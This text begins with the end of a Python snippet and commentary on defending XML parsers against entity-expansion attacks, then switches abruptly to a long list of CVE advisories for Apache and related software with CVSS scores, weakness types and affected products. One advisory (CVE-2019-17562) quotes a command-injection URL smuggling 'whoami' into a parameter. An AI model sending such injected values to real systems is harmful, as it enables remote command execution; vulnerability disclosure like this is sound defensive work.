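    """Bytes of text produced per byte of input; a large value is the attack signature."""
    return len(parse_text_lenient(doc)) / len(doc)


def is_rejected(doc: str) -> bool:
    try:
        parse_text_hardened(doc)
    except DoctypeRejected:
        return True
    return False
```

Rejecting the DOCTYPE outright is the right default for a service that accepts XML from callers: none of the three affected code paths needs a DTD, and it closes both the expansion and the external-entity case with one handler. Where a DTD genuinely is required, the alternatives (entity-count and expansion limits, a resolver that refuses every external reference) need to be applied together, which is exactly what the Solr fix had to do for its update handler.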
CVE-2019-12416 MEDIUM

We received reports of two injection attacks against the DeltaSpike windowhandler.js. This is only active if a developer selected the ClientSideWindowStrategy, which is not the default.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-74,

Products Affected

Vendor Product Version
apache deltaspike *
CVE-2019-12417 LOW

A malicious admin user could edit the state of objects in the Airflow metadata database to execute arbitrary javascript on certain page views. This also presented a Local File Disclosure vulnerability to any file readable by the webserver process.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.8 MEDIUM CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N 1.7 2.7

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache airflow *
CVE-2019-12418 MEDIUM

When Apache Tomcat 9.0.0.M1 to 9.0.28, 8.5.0 to 8.5.47, 7.0.0 and 7.0.97 are configured with the JMX Remote Lifecycle Listener, a local attacker without access to the Tomcat process or configuration files is able to manipulate the RMI registry to perform a man-in-the-middle attack and capture the user names and passwords used to access the JMX interface. The attacker can then use these credentials to access the JMX interface and gain complete control over the Tomcat instance.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.0 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 1.0 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache tomcat *
canonical ubuntu_linux 16.04
debian debian_linux 9.0
opensuse leap 15.1
oracle workload_manager 18c
debian debian_linux 10.0
oracle workload_manager 19c
netapp oncommand_system_manager *
oracle workload_manager 12.2.0.1
debian debian_linux 8.0
CVE-2019-12419 HIGH

Apache CXF before 3.3.4 and 3.2.11 provides all of the components that are required to build a fully fledged OpenId Connect service. There is a vulnerability in the access token services, where it does not validate that the authenticated principal is equal to that of the supplied clientId parameter in the request. If a malicious client was able to somehow steal an authorization code issued to another client, then they could exploit this vulnerability to obtain an access token for the other client.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-863,

Products Affected

Vendor Product Version
oracle commerce_guided_search 11.3.2
apache cxf *
oracle enterprise_manager_base_platform 13.2.1.0
oracle flexcube_private_banking 12.0.0
oracle flexcube_private_banking 12.1.0
oracle retail_order_broker 15.0
CVE-2019-12420 MEDIUM

In Apache SpamAssassin before 3.4.3, a message can be crafted in a way to use excessive resources. Upgrading to SA 3.4.3 as soon as possible is the recommended fix but details will not be shared publicly.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,

Products Affected

Vendor Product Version
apache spamassassin *
debian debian_linux 9.0
debian debian_linux 10.0
debian debian_linux 8.0
CVE-2019-12421 MEDIUM

When using an authentication mechanism other than PKI, when the user clicks Log Out in NiFi versions 1.0.0 to 1.9.2, NiFi invalidates the authentication token on the client side but not on the server side. This permits the user's client-side token to be used for up to 12 hours after logging out to make API requests to NiFi.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-613,

Products Affected

Vendor Product Version
apache nifi *
CVE-2019-12422 MEDIUM

In Apache Shiro before 1.4.2, when using the default "remember me" configuration, cookies could be susceptible to a padding attack.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache shiro *
CVE-2019-12423 MEDIUM

Apache CXF ships with an OpenId Connect JWK Keys service, which allows a client to obtain the public keys in JWK format; these can then be used to verify the signature of tokens issued by the service. Typically, the service obtains the public key from a local keystore (JKS/PKCS12) by specifying the path of the keystore and the alias of the keystore entry. This case is not vulnerable. However, it is also possible to obtain the keys from a JWK keystore file by setting the configuration parameter "rs.security.keystore.type" to "jwk". In this case all keys in the file are returned "as is", including all private key and secret key credentials. This is an obvious security risk if the user has configured the signature keystore file with private or secret key credentials. From CXF 3.3.5 and 3.2.12, it is mandatory to specify an alias corresponding to the id of the key in the JWK file, and only this key is returned. In addition, any private key information is omitted by default. "oct" keys, which contain secret keys, are not returned at all.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-522,

Products Affected

Vendor Product Version
oracle communications_session_report_manager *
oracle communications_session_route_manager 8.1.1
oracle commerce_guided_search 11.3.2
apache cxf *
oracle communications_session_route_manager 8.2.1
oracle communications_session_route_manager 8.2.0
oracle flexcube_private_banking 12.0.0
oracle communications_diameter_signaling_router *
oracle communications_element_manager *
oracle flexcube_private_banking 12.1.0
oracle retail_order_broker 15.0
CVE-2019-12425 MEDIUM

Apache OFBiz 17.12.01 is vulnerable to Host header injection by accepting arbitrary Host header values.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-74,

Products Affected

Vendor Product Version
apache ofbiz 17.12.01
CVE-2019-12426 MEDIUM

An unauthenticated user could get access to information from some backend screens by invoking setSessionLocale in Apache OFBiz 16.11.01 to 16.11.06.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2019-13990 HIGH

initDocumentParser in xml/XMLSchedulingDataProcessor.java in Terracotta Quartz Scheduler through 2.3.0 allows XXE attacks via a job description.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
atlassian jira_service_management 4.21.0
atlassian jira_service_management 5.4.9
atlassian jira_service_management 4.20.18
atlassian jira_service_management 5.4.6
oracle jd_edwards_enterpriseone_orchestrator *
oracle enterprise_manager_ops_center 12.4.0.0
atlassian jira_service_management 5.9.0
oracle apache_batik_mapviewer 19c
oracle retail_central_office 14.1
atlassian jira_service_management 5.4.5
atlassian jira_service_management 4.20.10
oracle primavera_unifier *
atlassian jira_service_management 5.4.2
atlassian jira_service_management 5.6.0
oracle terracotta_quartz_scheduler_mapviewer 19c
oracle apache_batik_mapviewer 18c
oracle retail_returns_management 14.1
atlassian jira_service_management 5.3.0
oracle primavera_unifier 16.1
atlassian jira_service_management 4.20.5
atlassian jira_service_management 5.4.3
atlassian jira_service_management 4.20.6
oracle webcenter_sites 12.2.1.3.0
atlassian jira_service_management 5.2.0
oracle retail_back_office 14.1
oracle retail_integration_bus 16.0
oracle communications_session_route_manager *
atlassian jira_service_management 5.7.0
atlassian jira_service_management 5.3.2
softwareag quartz *
atlassian jira_service_management 4.20.4
oracle customer_management_and_segmentation_foundation 18.0
oracle primavera_unifier 16.2
atlassian jira_service_management 5.4.8
oracle apache_batik_mapviewer 12.2.0.1
apache tomee 7.1.3
oracle flexcube_private_banking 12.0.0
atlassian jira_service_management 4.20.11
atlassian jira_service_management 5.10.0
oracle retail_order_broker 15.0
atlassian jira_service_management 4.20.2
atlassian jira_service_management 4.21.1
atlassian jira_service_management 4.22.4
oracle hyperion_infrastructure_technology 11.1.2.4
atlassian jira_service_management 4.20.15
atlassian jira_service_management 5.7.1
atlassian jira_service_management 5.8.0
atlassian jira_service_management 4.20.24
atlassian jira_service_management 4.20.20
oracle communications_ip_service_activator 7.4.0
oracle documaker *
atlassian jira_service_management 5.0.0
atlassian jira_service_management 4.20.22
oracle banking_enterprise_product_manufacturing 2.7.0
atlassian jira_service_management 4.20.1
atlassian jira_service_management 5.1.0
oracle flexcube_investor_servicing 12.3.0
atlassian jira_service_management 5.2.1
oracle flexcube_investor_servicing 12.4.0
oracle retail_xstore_point_of_service 18.0
oracle retail_xstore_point_of_service 16.0
oracle communications_ip_service_activator 7.3.0
oracle google_guava_mapviewer 19c
atlassian jira_service_management 5.4.7
atlassian jira_service_management 4.20.14
atlassian jira_service_management 4.20.25
atlassian jira_service_management 4.22.3
netapp cloud_secure_agent -
atlassian jira_service_management 4.20.19
oracle primavera_unifier 18.8
oracle retail_order_broker 19.0
atlassian jira_service_management 4.22.2
atlassian jira_service_management 4.22.6
oracle banking_enterprise_originations 2.7.0
oracle flexcube_investor_servicing 14.1.0
atlassian jira_service_management 4.20.9
oracle banking_enterprise_originations 2.8.0
oracle retail_xstore_point_of_service 19.0
oracle terracotta_quartz_scheduler_mapviewer 18c
atlassian jira_service_management 5.4.4
oracle google_guava_mapviewer 12.2.0.1
atlassian jira_service_management 4.20.16
atlassian jira_service_management 4.22.0
oracle flexcube_private_banking 12.1.0
atlassian jira_service_management 4.20.3
oracle webcenter_sites 12.2.1.4.0
atlassian jira_service_management 4.20.0
atlassian jira_service_management 4.20.17
atlassian jira_service_management 4.20.8
oracle retail_xstore_point_of_service 17.0
oracle enterprise_manager_base_platform 13.2.1.0
atlassian jira_service_management 5.1.1
oracle flexcube_investor_servicing 14.4.0
oracle banking_enterprise_product_manufacturing 2.8.0
atlassian jira_service_management 5.5.1
oracle retail_xstore_point_of_service 15.0
atlassian jira_service_management 4.20.12
atlassian jira_service_management 4.20.13
atlassian jira_service_management 5.8.1
atlassian jira_service_management 4.20.21
atlassian jira_service_management 4.22.1
atlassian jira_service_management 5.4.0
oracle banking_payments *
atlassian jira_service_management 5.4.1
atlassian jira_service_management 4.20.7
oracle google_guava_mapviewer 18c
oracle retail_order_broker 16.0
atlassian jira_service_management 5.3.1
oracle flexcube_investor_servicing 12.1.0
oracle fusion_middleware_mapviewer 12.2.1.3.0
netapp active_iq_unified_manager -
oracle retail_integration_bus 15.0
oracle retail_point-of-service 14.1
oracle terracotta_quartz_scheduler_mapviewer 12.2.0.1
atlassian jira_service_management 4.20.23
oracle retail_order_broker 18.0
atlassian jira_service_management 5.3.3
CVE-2019-14439 MEDIUM

A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9.2. This occurs when Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the logback jar in the classpath.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-502,

Products Affected

Vendor Product Version
oracle retail_customer_management_and_segmentation_foundation 17.0
oracle banking_platform 2.7.0
oracle financial_services_analytical_applications_infrastructure *
oracle banking_platform 2.4.1
redhat jboss_middleware_text-only_advisories 1.0
debian debian_linux 10.0
oracle banking_platform 2.6.0
oracle retail_xstore_point_of_service 17.0
oracle jd_edwards_enterpriseone_orchestrator 9.2
oracle primavera_gateway 15.2
oracle primavera_gateway *
oracle retail_xstore_point_of_service 18.0
oracle communications_diameter_signaling_router 8.2.1
oracle retail_xstore_point_of_service 16.0
oracle retail_xstore_point_of_service 7.1
oracle communications_diameter_signaling_router 8.0.0
oracle retail_xstore_point_of_service 15.0
oracle primavera_gateway 16.2
oracle siebel_engineering_-_installer_&_deployment *
fedoraproject fedora 29
oracle global_lifecycle_management_opatch 13.9.4.2.1
oracle siebel_ui_framework *
oracle banking_platform 2.6.1
debian debian_linux 9.0
oracle primavera_gateway 16.1
oracle communications_diameter_signaling_router 8.1
oracle goldengate_stream_analytics *
fasterxml jackson-databind *
oracle communications_instant_messaging_server 10.0.1.3.0
debian debian_linux 8.0
fedoraproject fedora 30
oracle global_lifecycle_management_opatch *
oracle banking_platform 2.5.0
oracle jd_edwards_enterpriseone_tools 9.2
oracle banking_platform 2.4.0
oracle banking_platform 2.7.1
oracle global_lifecycle_management_opatch 11.2.0.3.23
apache drill 1.16.0
oracle communications_diameter_signaling_router 8.2
oracle primavera_gateway 18.8.0
CVE-2019-14892 HIGH

A flaw was discovered in jackson-databind in versions before 2.9.10, 2.8.11.5 and 2.6.7.3, where it would permit polymorphic deserialization of a malicious object using commons-configuration 1 and 2 JNDI classes. An attacker could use this flaw to execute arbitrary code.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-200,CWE-502,

Products Affected

Vendor Product Version
redhat jboss_enterprise_application_platform 7.0
redhat openshift_container_platform 4.3
redhat jboss_data_grid 7.0.0
redhat jboss_fuse 7.0.0
redhat jboss_data_grid -
apache geode 1.12.0
redhat process_automation 7.0
fasterxml jackson-databind *
redhat decision_manager 7.0
CVE-2019-15544 MEDIUM

An issue was discovered in the protobuf crate before 2.6.0 for Rust. Attackers can exhaust all memory via Vec::reserve calls.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-770,

Products Affected

Vendor Product Version
rust-protobuf_project rust-protobuf *
apache hbase 2.2.3
CVE-2019-15752 HIGH

Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-credential-wincred.exe file in %PROGRAMDATA%\DockerDesktop\version-bin\ as a low-privilege user, and then waiting for an admin or service user to authenticate with Docker, restart Docker, or run 'docker login' to force the command.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-732,

Products Affected

Vendor Product Version
apache geode 1.12.0
docker docker *
CVE-2019-17195 MEDIUM

Connect2id Nimbus JOSE+JWT before v7.9 can throw various uncaught exceptions while parsing a JWT, which could result in an application crash (potential information disclosure) or a potential authentication bypass.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-755,

Products Affected

Vendor Product Version
oracle peoplesoft_enterprise_peopletools 8.59
oracle insurance_policy_administration *
oracle jd_edwards_enterpriseone_tools *
oracle enterprise_manager_base_platform 13.4.0.0
oracle primavera_gateway 19.12.0
oracle jd_edwards_enterpriseone_orchestrator *
apache hadoop 3.2.1
oracle data_integrator 12.2.1.4.0
oracle primavera_gateway *
oracle peoplesoft_enterprise_peopletools 8.58
oracle policy_automation *
oracle communications_pricing_design_center 12.0.0.3.0
oracle communications_cloud_native_core_security_edge_protection_proxy 1.7.0
oracle weblogic_server 12.2.1.4.0
connect2id nimbus_jose+jwt *
oracle solaris_cluster 4.0
oracle weblogic_server 12.2.1.3.0
oracle healthcare_data_repository 8.1.0
CVE-2019-17359 MEDIUM

The ASN.1 parser in Bouncy Castle Crypto (aka BC Java) 1.63 can trigger a large attempted memory allocation, and a resultant OutOfMemoryError, via crafted ASN.1 data. This is fixed in 1.64.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-770,

Products Affected

Vendor Product Version
oracle peoplesoft_enterprise_hcm_global_payroll_switzerland 9.2
oracle business_process_management_suite 12.2.1.3.0
oracle communications_session_route_manager *
bouncycastle bc-java 1.63
netapp active_iq_unified_manager *
oracle retail_xstore_point_of_service 18.0.1
oracle financial_services_analytical_applications_infrastructure *
oracle webcenter_portal 11.1.1.9.0
netapp service_level_manager -
oracle communications_diameter_signaling_router *
oracle managed_file_transfer 12.2.1.4.0
oracle data_integrator 12.2.1.4.0
oracle peoplesoft_enterprise_peopletools 8.58
oracle hospitality_guest_access 4.2.0
oracle flexcube_private_banking 12.0.0
oracle weblogic_server 12.2.1.4.0
oracle weblogic_server 12.2.1.3.0
oracle peoplesoft_enterprise_peopletools 8.57
netapp oncommand_api_services -
oracle webcenter_portal 12.2.1.3.0
apache tomee 8.0.1
oracle webcenter_portal 12.2.1.4.0
oracle soa_suite 12.2.1.3.0
bouncycastle legion-of-the-bouncy-castle-java-crytography-api 1.63
oracle business_process_management_suite 12.2.1.4.0
oracle communications_convergence *
oracle peoplesoft_enterprise_peopletools 8.56
oracle managed_file_transfer 12.2.1.3.0
oracle soa_suite 12.2.1.4.0
apache tomee 7.0.7
apache tomee 7.1.2
netapp oncommand_workflow_automation -
oracle flexcube_private_banking 12.1.0
CVE-2019-17554 MEDIUM

The XML content type entity deserializer in Apache Olingo versions 4.0.0 to 4.6.0 is not configured to deny the resolution of external entities. Requests with content type "application/xml", which trigger the deserialization of entities, can be used to trigger XXE attacks.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache olingo *
CVE-2019-17555 MEDIUM

The AsyncResponseWrapperImpl class in Apache Olingo versions 4.0.0 to 4.6.0 reads the Retry-After header and passes it to the Thread.sleep() method without any check. If a malicious server returns a huge value in the header, then it can help to implement a DoS attack.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache olingo *
CVE-2019-17556 HIGH

Apache Olingo versions 4.0.0 to 4.6.0 provide the AbstractService class, which is public API; it uses ObjectInputStream and does not check the classes being deserialized. If an attacker can feed malicious metadata to the class, it may result in running the attacker's code in the worst case.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache olingo *
CVE-2019-17557 LOW

It was found that the Apache Syncope EndUser UI login page prior to 2.0.15 and 2.1.6 reflects the successMessage parameter. By this means, a user accessing the EndUser UI could execute JavaScript code from the URL query string.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 2.3 2.7

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache syncope *
CVE-2019-17558 MEDIUM

Apache Solr 5.0.0 to Apache Solr 8.3.1 are vulnerable to Remote Code Execution through the VelocityResponseWriter. A Velocity template can be provided either through Velocity templates in a configset `velocity/` directory or as a parameter. A user-defined configset could contain renderable, potentially malicious, templates. Parameter-provided templates are disabled by default, but can be enabled by defining a response writer with the `params.resource.loader.enabled` setting set to `true`. Defining a response writer requires configuration API access. Solr 8.4 removed the params resource loader entirely, and only enables configset-provided template rendering when the configset is `trusted` (has been uploaded by an authenticated user).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 1.6 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-74,

Products Affected

Vendor Product Version
oracle primavera_unifier 19.12
oracle primavera_unifier 16.2
oracle primavera_unifier *
oracle primavera_unifier 18.8
oracle primavera_unifier 16.1
apache solr *
CVE-2019-17559 HIGH

There is a vulnerability in Apache Traffic Server 6.0.0 to 6.2.3, 7.0.0 to 7.1.8, and 8.0.0 to 8.0.5 with a smuggling attack and scheme parsing. Upgrade to versions 7.1.9 and 8.0.6 or later versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-444,

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache traffic_server *
CVE-2019-17560 MEDIUM

The "Apache NetBeans" autoupdate system does not validate SSL certificates and hostnames for https-based downloads. This allows an attacker to intercept downloads of autoupdates and modify the download, potentially injecting malicious code. "Apache NetBeans" versions up to and including 11.2 are affected by this vulnerability.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
oracle graalvm 19.3.2
apache netbeans *
oracle graalvm 20.1.0
CVE-2019-17561 MEDIUM

The "Apache NetBeans" autoupdate system does not fully validate code signatures. An attacker could modify the downloaded nbm and include additional code. "Apache NetBeans" versions up to and including 11.2 are affected by this vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-347,

Products Affected

Vendor Product Version
oracle graalvm 19.3.2
apache netbeans *
oracle graalvm 20.1.0
CVE-2019-17562 HIGH

A buffer overflow vulnerability has been found in the baremetal component of Apache CloudStack. This applies to all versions prior to 4.13.1. The vulnerability is due to the lack of validation of the mac parameter in baremetal virtual router. If you insert an arbitrary shell command into the mac parameter, v-router will process the command. For example: Normal: http://{GW}:10086/baremetal/provisiondone/{mac}, Abnormal: http://{GW}:10086/baremetal/provisiondone/#';whoami;#. Mitigation of this issue is an upgrade to Apache CloudStack 4.13.1.0 or beyond.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache cloudstack *
CVE-2019-17563 MEDIUM

When using FORM authentication with Apache Tomcat 9.0.0.M1 to 9.0.29, 8.5.0 to 8.5.49 and 7.0.0 to 7.0.98 there was a narrow window where an attacker could perform a session fixation attack. The window was considered too narrow for an exploit to be practical but, erring on the side of caution, this issue has been treated as a security vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H 1.6 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-384,

Products Affected

Vendor Product Version
oracle instantis_enterprisetrack *
oracle hyperion_infrastructure_technology 11.1.2.4
oracle micros_relate_crm_software 11.4
debian debian_linux 9.0
opensuse leap 15.1
oracle agile_engineering_data_management 6.2.1.0
debian debian_linux 10.0
debian debian_linux 8.0
apache tomcat *
oracle transportation_management 6.3.7
canonical ubuntu_linux 16.04
oracle mysql_enterprise_monitor *
oracle retail_order_broker 15.0
CVE-2019-17564 MEDIUM

Unsafe deserialization occurs within a Dubbo application which has HTTP remoting enabled. An attacker may submit a POST request with a Java object in it to completely compromise a Provider instance of Apache Dubbo, if this instance enables HTTP. This issue affected Apache Dubbo 2.7.0 to 2.7.4, 2.6.0 to 2.6.7, and all 2.5.x versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache dubbo *
CVE-2019-17565 HIGH

There is a vulnerability in Apache Traffic Server 6.0.0 to 6.2.3, 7.0.0 to 7.1.8, and 8.0.0 to 8.0.5 with a smuggling attack and chunked encoding. Upgrade to versions 7.1.9 and 8.0.6 or later versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-444,

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache traffic_server *
CVE-2019-17566 MEDIUM

Apache Batik is vulnerable to server-side request forgery, caused by improper input validation by the "xlink:href" attributes. By using a specially-crafted argument, an attacker could exploit this vulnerability to cause the underlying server to make arbitrary GET requests.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-918,

Products Affected

Vendor Product Version
oracle instantis_enterprisetrack *
oracle jd_edwards_enterpriseone_tools *
apache batik *
oracle enterprise_repository 11.1.1.7.0
oracle financial_services_analytical_applications_infrastructure *
oracle api_gateway 11.1.2.4.0
oracle business_intelligence 12.2.1.4.0
oracle hospitality_opera_5 5.6
oracle business_intelligence 5.9.0.0.0
oracle business_intelligence 5.5.0.0.0
oracle business_intelligence 12.2.1.3.0
oracle retail_order_broker 15.0
oracle retail_integration_bus 15.0.3
oracle retail_order_management_system_cloud_service 19.5
oracle retail_returns_management 14.1
oracle retail_order_broker 16.0
oracle communications_application_session_controller 3.9m0p2
oracle communications_offline_mediation_controller 12.0.0.3.0
oracle hyperion_financial_reporting 11.1.2.4
oracle retail_point-of-service 14.1
oracle fusion_middleware_mapviewer 12.2.1.4.0
oracle jd_edwards_enterpriseone_tools 9.2.4.2
oracle communications_metasolv_solution *
oracle hospitality_opera_5 5.5
oracle hyperion_financial_reporting 11.2.5.0
CVE-2019-17567 MEDIUM

In Apache HTTP Server versions 2.4.6 to 2.4.46, mod_proxy_wstunnel configured on a URL that is not necessarily Upgraded by the origin server was tunneling the whole connection regardless, thus allowing subsequent requests on the same connection to pass through without any HTTP validation, authentication or authorization that might be configured.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-444,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache http_server *
fedoraproject fedora 34
oracle instantis_enterprisetrack 17.1
oracle zfs_storage_appliance_kit 8.8
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
oracle enterprise_manager_ops_center 12.4.0.0
CVE-2019-17569 MEDIUM

The refactoring present in Apache Tomcat 9.0.28 to 9.0.30, 8.5.48 to 8.5.50 and 7.0.98 to 7.0.99 introduced a regression. The result of the regression was that invalid Transfer-Encoding headers were incorrectly processed leading to a possibility of HTTP Request Smuggling if Tomcat was located behind a reverse proxy that incorrectly handled the invalid Transfer-Encoding header in a particular manner. Such a reverse proxy is considered unlikely.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.8 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N 2.2 2.5

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-444,

Products Affected

Vendor Product Version
oracle instantis_enterprisetrack *
debian debian_linux 9.0
opensuse leap 15.1
oracle workload_manager 18c
oracle agile_engineering_data_management 6.2.1.0
debian debian_linux 10.0
oracle hospitality_guest_access 4.2.1
oracle workload_manager 19c
oracle workload_manager 12.2.0.1
apache tomcat *
oracle transportation_management 6.3.7
oracle communications_instant_messaging_server 10.0.1.4.0
oracle agile_plm 9.3.3
oracle health_sciences_empirica_signal 7.3.3
netapp data_availability_services -
oracle agile_plm 9.3.5
oracle agile_plm 9.3.6
oracle mysql_enterprise_monitor *
oracle hospitality_guest_access 4.2.0
apache tomee 7.0.7
netapp oncommand_system_manager *
oracle health_sciences_empirica_inspections 1.0.1.2
CVE-2019-17570 HIGH

An untrusted deserialization was found in the org.apache.xmlrpc.parser.XmlRpcResponseParser:addResult method of the Apache XML-RPC (aka ws-xmlrpc) library. A malicious XML-RPC server could target an XML-RPC client, causing it to execute arbitrary code. Apache XML-RPC is no longer maintained and this issue will not be fixed.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
canonical ubuntu_linux 18.04
debian debian_linux 9.0
apache xml-rpc 3.1.1
debian debian_linux 10.0
apache xml-rpc 3.1.2
debian debian_linux 8.0
apache xml-rpc 3.1
fedoraproject fedora 32
canonical ubuntu_linux 16.04
fedoraproject fedora 31
apache xml-rpc 3.1.3
redhat software_collections 1.0
